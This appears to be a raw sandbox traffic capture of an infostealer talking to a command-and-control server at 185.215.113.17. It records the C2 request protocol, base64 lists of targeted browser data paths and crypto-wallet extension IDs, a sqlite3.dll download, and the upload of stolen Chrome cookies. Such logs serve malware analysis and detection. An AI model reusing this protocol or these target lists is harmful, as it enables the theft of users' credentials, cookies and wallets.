6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 43 46 43 46 42 47 44 48 49 45 43 41 41 46 49 49 44 2d 2d 0d 0a Data Ascii: ------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="token"8954c73af64fce544a0b300105e8c1a1649557048a87812891c9b105913ffd44d10196cb------JKECFCFBGDHIECAAFIIDContent-Disposition: form-data; name="message"browsers------JKECFCFBGDHIECAAFIID--
Aug 31, 2024 15:44:16.506169081 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:16 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Aug 31, 2024 15:44:16.506305933 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Aug 31, 2024 15:44:16.507596970 CEST	468	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAFBAKECAEGCBFIEGDGI Host: 185.215.113.17 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 35 34 63 37 33 61 66 36 34 66 63 65 35 34 34 61 30 62 33 30 30 31 30 35 65 38 63 31 61 31 36 34 39 35 35 37 30 34 38 61 38 37 38 31 32 38 39 31 63 39 62 31 30 35 39 31 33 66 66 64 34 34 64 31 30 31 39 36 63 62 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 2d 2d 0d 0a Data Ascii: ------AAFBAKECAEGCBFIEGDGIContent-Disposition: form-data; name="token"8954c73af64fce544a0b300105e8c1a1649557048a87812891c9b105913ffd44d10196cb------AAFBAKECAEGCBFIEGDGIContent-Disposition: form-data; name="message"plugins------AAFBAKECAEGCBFIEGDGI--
Aug 31, 2024 15:44:17.020313978 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:16 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Aug 31, 2024 15:44:17.020325899 CEST	164	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9n
Aug 31, 2024 15:44:17.184742928 CEST	1236	IN	Data Raw: 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 77 78 66 44 42 38 4d 48 78 54 62 32 78 73 5a 58 52 38 5a 6d 68 74 5a 6d 56 75 5a 47 64 6b 62 32 4e 74 59 32 4a 74 5a 6d 6c 72 5a 47 4e 76 5a 32 39 6d 63 47 Data Ascii: a2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZ
Aug 31, 2024 15:44:17.184798002 CEST	164	IN	Data Raw: 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c 5a 47 78 77 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d Data Ascii: ZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6
Aug 31, 2024 15:44:17.275136948 CEST	1236	IN	Data Raw: 51 6d 39 34 66 47 31 75 5a 6d 6c 6d 5a 57 5a 72 59 57 70 6e 62 32 5a 72 59 32 70 72 5a 57 31 70 5a 47 6c 68 5a 57 4e 76 59 32 35 72 61 6d 56 6f 66 44 46 38 4d 48 77 77 66 46 52 6c 62 58 42 73 5a 58 78 76 62 32 74 71 62 47 4a 72 61 57 6c 71 61 57 Data Ascii: Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZvZGptfDF8MHwwfFJvbmluIFdhbGxldHxram1vb2hsZ29rY2NvZGljampmZWJmb21sYmxqZ2Zoa3wxfDB
Aug 31, 2024 15:44:17.275226116 CEST	164	IN	Data Raw: 5a 32 35 73 62 57 70 6c 5a 57 64 71 59 57 64 73 62 57 56 77 59 6d 31 77 61 33 42 70 66 44 46 38 4d 48 77 77 66 46 52 79 5a 58 70 76 63 69 42 51 59 58 4e 7a 64 32 39 79 5a 43 42 4e 59 57 35 68 5a 32 56 79 66 47 6c 74 62 47 39 70 5a 6d 74 6e 61 6d Data Ascii: Z25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhp
Aug 31, 2024 15:44:17.334033966 CEST	1236	IN	Data Raw: 5a 32 39 76 62 32 46 6b 5a 47 6c 75 63 47 74 69 59 57 6c 38 4d 58 77 77 66 44 42 38 51 58 56 30 61 48 6c 38 5a 32 46 6c 5a 47 31 71 5a 47 5a 74 62 57 46 6f 61 47 4a 71 5a 57 5a 6a 59 6d 64 68 62 32 78 6f 61 47 46 75 62 47 46 76 62 47 4a 38 4d 58 Data Ascii: Z29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHBubWRiY2hvbmllbGlkZ29iZGRmZmZsYWx8MXwwfDB8R0F1dGggQXV0aGVudGljYXRvcnxpbGdjbmhlbHBjaG5jZWVpcGlwaWphbGprYmxiY29ibHwxfDB8MHx
Aug 31, 2024 15:44:17.334048986 CEST	1236	IN	Data Raw: 59 6d 39 33 49 46 64 68 62 47 78 6c 64 48 78 76 63 47 5a 6e 5a 57 78 74 59 32 31 69 61 57 46 71 59 57 31 6c 63 47 35 74 62 47 39 70 61 6d 4a 77 62 32 78 6c 61 57 46 74 59 58 77 78 66 44 42 38 4d 48 78 4f 61 57 64 6f 64 47 78 35 49 46 64 68 62 47 Data Ascii: Ym93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2x
Aug 31, 2024 15:44:17.334064960 CEST	672	IN	Data Raw: 59 32 4a 72 62 57 68 68 5a 6e 77 78 66 44 42 38 4d 48 78 4e 59 57 64 70 59 79 42 46 5a 47 56 75 49 46 64 68 62 47 78 6c 64 48 78 74 61 33 42 6c 5a 32 70 72 59 6d 78 72 61 32 56 6d 59 57 4e 6d 62 6d 31 72 59 57 70 6a 61 6d 31 68 59 6d 6c 71 61 47 Data Ascii: Y2JrbWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1hYmlqaGNsZ3wxfDB8MHxCYWNrcGFjayBXYWxsZXR8YWZsa21maGViZWRiamlvaXBnbGdjYmNtbmJwZ2xpb2Z8MXwwfDB8VG9ua2VlcGVyIFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHx
Aug 31, 2024 15:44:17.335645914 CEST	469	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCG Host: 185.215.113.17 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 35 34 63 37 33 61 66 36 34 66 63 65 35 34 34 61 30 62 33 30 30 31 30 35 65 38 63 31 61 31 36 34 39 35 35 37 30 34 38 61 38 37 38 31 32 38 39 31 63 39 62 31 30 35 39 31 33 66 66 64 34 34 64 31 30 31 39 36 63 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 2d 2d 0d 0a Data Ascii: ------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="token"8954c73af64fce544a0b300105e8c1a1649557048a87812891c9b105913ffd44d10196cb------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="message"fplugins------KEBFHIJECFIDGDGCGHCG--
Aug 31, 2024 15:44:17.581871986 CEST	335	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:17 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Aug 31, 2024 15:44:17.807478905 CEST	202	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCBAKJEHDBGHIEBGCGDG Host: 185.215.113.17 Content-Length: 6539 Connection: Keep-Alive Cache-Control: no-cache
Aug 31, 2024 15:44:17.807693958 CEST	6539	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 35 34 63 37 Data Ascii: ------HCBAKJEHDBGHIEBGCGDGContent-Disposition: form-data; name="token"8954c73af64fce544a0b300105e8c1a1649557048a87812891c9b105913ffd44d10196cb------HCBAKJEHDBGHIEBGCGDGContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Aug 31, 2024 15:44:18.143260956 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 31, 2024 15:44:18.384673119 CEST	93	OUT	GET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Aug 31, 2024 15:44:18.637640953 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:18 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Aug 31, 2024 15:44:25.417210102 CEST	952	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGCFHDAKECFIDGDGDBKJ Host: 185.215.113.17 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 43 46 48 44 41 4b 45 43 46 49 44 47 44 47 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 35 34 63 37 33 61 66 36 34 66 63 65 35 34 34 61 30 62 33 30 30 31 30 35 65 38 63 31 61 31 36 34 39 35 35 37 30 34 38 61 38 37 38 31 32 38 39 31 63 39 62 31 30 35 39 31 33 66 66 64 34 34 64 31 30 31 39 36 63 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 48 44 41 4b 45 43 46 49 44 47 44 47 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 46 48 44 41 4b 45 43 46 49 44 47 44 47 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------EGCFHDAKECFIDGDGDBKJContent-Disposition: form-data; name="token"8954c73af64fce544a0b300105e8c1a1649557048a87812891c9b105913ffd44d10196cb------EGCFHDAKECFIDGDGDBKJContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------EGCFHDAKECFIDGDGDBKJContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------EGCFHDAKECFIDGDGDBKJ--
Aug 31, 2024 15:44:25.732403040 CEST	202	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 31, 2024 15:44:26.121768951 CEST	564	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDGCFBAFBFHJEBGCAEGH Host: 185.215.113.17 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 35 34 63 37 33 61 66 36 34 66 63 65 35 34 34 61 30 62 33 30 30 31 30 35 65 38 63 31 61 31 36 34 39 35 35 37 30 34 38 61 38 37 38 31 32 38 39 31 63 39 62 31 30 35 39 31 33 66 66 64 34 34 64 31 30 31 39 36 63 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 43 46 42 41 46 42 46 48 4a 45 42 47 43 41 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="token"8954c73af64fce544a0b300105e8c1a1649557048a87812891c9b105913ffd44d10196cb------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JDGCFBAFBFHJEBGCAEGHContent-Disposition: form-data; name="file"------JDGCFBAFBFHJEBGCAEGH--
